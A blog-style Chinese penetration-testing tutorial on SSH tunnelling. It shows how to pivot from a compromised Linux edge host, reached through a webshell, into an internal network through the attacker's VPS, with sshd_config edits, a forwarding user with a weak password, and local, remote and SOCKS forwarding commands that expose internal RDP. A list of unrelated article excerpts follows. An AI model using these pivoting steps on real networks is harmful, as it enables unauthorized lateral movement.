一.应用场景

获取到目标边界机器linux服务器一台,想继而向内网其他机器渗透,获取到一台webshell发现处于内网当中且不通外网。可以通过linux ssh隧道对目标内网机器进行访问。

二.利用手法

ssh命令介绍:

-C  压缩传输数据,加快传输速度

-f  后台对用户名密码进行认证

-N  仅仅只用来转发,不用再弹回一个新的shell

-n  后台运行

-q  安静模式,不要显示警告等信息

-l  指定ssh登录名

-g  允许远程主机连接到本地转发的端口

-L  进行本地端口转发

-R  进行远程端口转发

-D  动态转发,即socks代理

-T  禁止分配伪终端

-p  指定远程ssh服务端口

需要对自己外网VPS SSH配置文件进行修改:/etc/ssh/sshd_config修改完成需重启SSH服务

PermitRootLogin yes  允许root远程登陆

AllowTcpForwarding yes

GatewayPorts yes

TCPKeepAlive yes  保持心跳,防止ssh断开

PasswordAuthentication yes

ServerAliveInterval=20

ServerAliveCountMax=8

/etc/init.d/sshd restart

创建建立转发用户

# useradd -s /sbin/nologin testtest

# echo "admin123123" | passwd --stdin testtest

边界机执行:本地端口转发:

ssh -C -f -N -g -L 边界机器linux:1231(任意端口):目标内网IP不出网:3389 testtest@外网VPS -p 22 本地转发

mstsc 边界机器:1231

边界机执行:远程端口转发:

把来自外部的 2222 端口流量全部转到目标端口3389端口

ssh -C -f -N -g -R 0.0.0.0:2222:目标内网机器:3389 root@外网VPS -p 22

mstsc 外网VPS:2222

三.ssh简单实现动态端口转发

ssh -qTfnN -D 0.0.0.0:1080 root@外网VPS -p 22

做好上面的转发之后,再回到外网vps(windows)这台机器上,利用putty通过动态端口的方式连到边界机

意思就是通过边界机将外网vps(linux)机器的1080端口和vps(windows)的1235端口进行绑定,即建立socks

这样当访问vps(windows)的1235端口就相当于访问边界机所在的整个目标内网段

 

ssh-qTfnN-D.0.0.0:1080root

内网端口转发[SSH]的更多相关文章

  1. 传输层隧道技术之lcx内网端口转发

    传输层技术包括TCP隧道.UDP隧道和常规端口转发等.在渗透测试中,如果内网防火墙阻止了指定端口的访问,在获得目标机器的权限后,可以使用IPTABLES打开指定端口.如果内网中存在一系列防御系统,TC ...

  2. SSH 内网端口转发实战

    导读 大家都知道SSH是一种安全的传输协议,用在连接服务器上比较多.不过其实除了这个功能,它的隧道转发功能更是吸引人. 如果两个内网之间的linux服务器需要互相登录,或需要互相访问内网某个端口,担忧 ...

  3. linux下内网端口转发工具:linux版lcx [实现远程内网维护]

    这个工具以前使用的初衷是内网渗透,需要将内网ssh端口转发到外网服务器上.但这个工具同样适用于运维工程师进行远程内网维护. 当然这一切的前提是内网可以访问外网,检测方法当然就是直接ping 一个外网I ...

  4. 内网端口转发[netsh]

    一.利用场景 当前获取目标内网边界区域一台机器,可以通外网和内网也就是存在两块网卡,又通过其他手段获取到内网另外一台机器,但是这台机器不能出外网,所以我们可以使用windows自带netsh命令通过边 ...

  5. 使用LCX进行内网端口转发

    Lcx.exe是一个端口转发工具,相当于把目标服务器A上的3389端口转发到具有外网ip地址的B机上(即我们自己的主机或是已经控制的主机),这样链接B机的3389端口就相当于链接A机的3389端口了, ...

  6. WlMAP:突破内网端口转发映射工具

    使用说明 Wlmap包括服务端程序和客户端程序两部分 服务端程序Wlmaps一般架设到其它用户可以访问到的地方例如internet,它主要用来记录客户端信息以及端口映射信息,并且转发用户和客户端之间数 ...

  7. 把www.domain.com均衡到本机不同的端口 反向代理 隐藏端口 Nginx做非80端口转发 搭建nginx反向代理用做内网域名转发 location 规则

    负载均衡-Nginx中文文档 http://www.nginx.cn/doc/example/loadbanlance.html 负载均衡 一个简单的负载均衡的示例,把www.domain.com均衡 ...

  8. iptables端口转发规则(内网端口转外网端口)

    需求:外网124.202.173.118需要访问 10.45.225.70的内网54032端口,10.45.225.70服务器有公网地址139.129.109.81将内网地址端口转发到外网地址端口,并 ...

  9. 端口被占用通过域名的处理 把www.domain.com均衡到本机不同的端口 反向代理 隐藏端口 Nginx做非80端口转发 搭建nginx反向代理用做内网域名转发 location 规则

    负载均衡-Nginx中文文档 http://www.nginx.cn/doc/example/loadbanlance.html 负载均衡 一个简单的负载均衡的示例,把www.domain.com均衡 ...

随机推荐

  1. PHP正则表达式中的反斜线

    PHP反斜线再正则表达式中的使用 <?php $str = 'hello\world'; $pattern = '/hello\\\\world/'; preg_match($pattern,$ ...

  2. CSS 中功能相似伪类间的区别

    导读: CSS3 中有许多伪类选择器,其中一些伪类选择器的作用近似却又不完全一样,下面我们就来看一看到底有什么不一样. 1.:only-child 与 :only-of-type 测试的代码: < ...

  3. 判断list中元素是否是相邻

    private static List<Integer> findShunZi(List<Integer> tmpCards){ List<Integer> lis ...

  4. python中关于is,=和==的区别

    在Python中 '='相当于赋值 '=='相当于等号两边的值相同 is则是表示两边的id,也就是内存地址相同

  5. centos7-关闭 rpcbind 服务

    1.关闭 rpcbind 服务 sudo systemctl disable rpcbind 2.关闭开机自启动 sudo  systemctl disable rpcbind 3.立即执行关闭 sy ...

  6. 阿里linux-Centos各版本下载

    https://mirrors.aliyun.com/centos/7/isos/x86_64/ Index of /centos/7/isos/x86_64/ ../ 0_README.txt 16 ...

  7. xshell本地上传文件到Ubuntu上及从Ubuntu上下载文件到本地

    1.第一种方法是最常用的 :如果下载了Xshell和Xftp,Ctrl+Alt+F就可以选择文件的互传了!(虚拟机/云服务器通用)--只要相互间能ping得通. 2.第二种方法 :ubuntu环境下安 ...

  8. php随机生成数字加字母的字符串

    function getRandomString($len, $chars=null) { if (is_null($chars)) { $chars = "ABCDEFGHIJKLMNOP ...

  9. 每天一个Linux命令:pwd(3)

    pwd pwd是Print Working Directory的缩写,其功能是显示当前所在工作目录的全路径.主要用在当不确定当前所在位置时,通过pwd来查看当前目录的绝对路径 格式 pwd [选项] ...

  10. 【LeetCode 8】字符串转换整数 (atoi)

    题目链接 [题解] 注意越界的处理就好 简单题 还有.. 正的-2^31不能由2^31取相反数得到,因为正的int最多到2^31-1 [代码] class Solution { public: boo ...